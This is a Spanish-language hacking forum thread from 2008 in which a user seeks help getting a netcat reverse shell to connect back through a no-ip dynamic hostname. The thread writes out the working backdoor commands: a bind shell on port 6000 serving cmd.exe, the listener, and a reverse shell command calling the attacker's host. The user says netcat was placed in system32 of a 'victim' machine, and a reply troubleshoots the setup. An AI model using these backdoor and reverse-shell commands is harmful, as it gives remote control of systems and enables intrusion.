elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Ingresar Registrarse
06 Septiembre 2008, 00:35  

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderador: zhyzura)
| | | |-+  ayuda con netcat y no-ip
Páginas: [1] Ir Abajo Imprimir
Autor Tema: ayuda con netcat y no-ip  (Leído 171 veces)
chalo11

Desconectado Desconectado

Ver Perfil
ayuda con netcat y no-ip
« en: 05 Junio 2008, 22:09 »

hola k tal amigos ojala me puedan ayudar, miren lo que pasa es lo sgte:
estoy intentando conectarme a una reverse chell con netcat. bueno instale el netcat en la maquina victima (con consentimiento del dueño) en system32.
La cosa es que funciona bien al momento de dejarle un netcat como puerta trasera a la escucha asi (nc -l -d -e cmd.exe -p 6000) luego yo me conectaba a la maquina victima asi (nc -vv ipvictima 6000) funciona correctamente.

pero nos dimos cuenta que quita tiempo tener que investigar una y otra ves la ip de la victima,entonces nos creamos una cuenta no-ip para la conecion inversa.

en la maquina atacante pusimos a la escucha de la siguiente forma:
(nc -vv -l -p 6000), y ahora la maquina victima se conectara a nosotros, y colocamos en la victima de la siguiente forma (nc -d -e cmd.exe nombre.no-ip.biz 6000)
pero el problema es que no obtengo la conexión,el pc de la victima al cual hacemos las pruebas esta conectado a un router que tambien provee de conexión a internet a otro computador, sera ese el problema?
o estaremos haciendo algo mal ojala me puedan ayudar chaooo gracias ;D
Novlucker

Ver Perfil
Re: ayuda con netcat y no-ip
« Respuesta #1 en: 05 Junio 2008, 23:56 »

Buenas.. no me queda claro que función cumple el nombre.no-ip.biz en el comando de la victima

En la víctima
nc -d -e cmd.exe nombre.no-ip.biz 6000

Pero se supone que nombre.no-ip.biz es la victima, entonces.. desde la víctima, estás intentando conectarte a la víctima, es decir a la misma pc.. pero eso no se va a lograr si no la pones además, a la escucha....

Si vas a hacer un reverse shell el no-ip debe de estar instalado en la pc atacante  :P

Saludos

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y del Universo no estoy seguro."
Albert Einstein

chalo11

Ver Perfil
Re: ayuda con netcat y no-ip
« Respuesta #2 en: 06 Junio 2008, 16:19 »

si el no-ip duc esta instalado en el computador atacante, el cual entre con mi mail y clave que ingrese al crearme la cuenta de no -ip.

y el nombre.no-ip.biz es el hostname que yo cree en la pagina de no-ip
en este caso le puse chalo.no-ip.biz.

mi computador lo deje a la escucha asi: (nc -vv -l -p 6000) y en el computador victima le ingrese lo siguiente: (nc -d -e cmd.exe chalo.no-ip.biz 6000) ocupe el puerto 6000. y deje antes  activado el no-ip duc (el cual el icono de la carita se puso roja).

esta bien lo que estoy haciendo,porque al hacer enter  en la maquina victima con los comandos ingresados, pareciera que se conecta pero nunca llega la conexión al equipo atacante. chaooo y gracias Novlucker  ;D
Páginas: [1] Ir Arriba Imprimir 
Ir a:  

Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.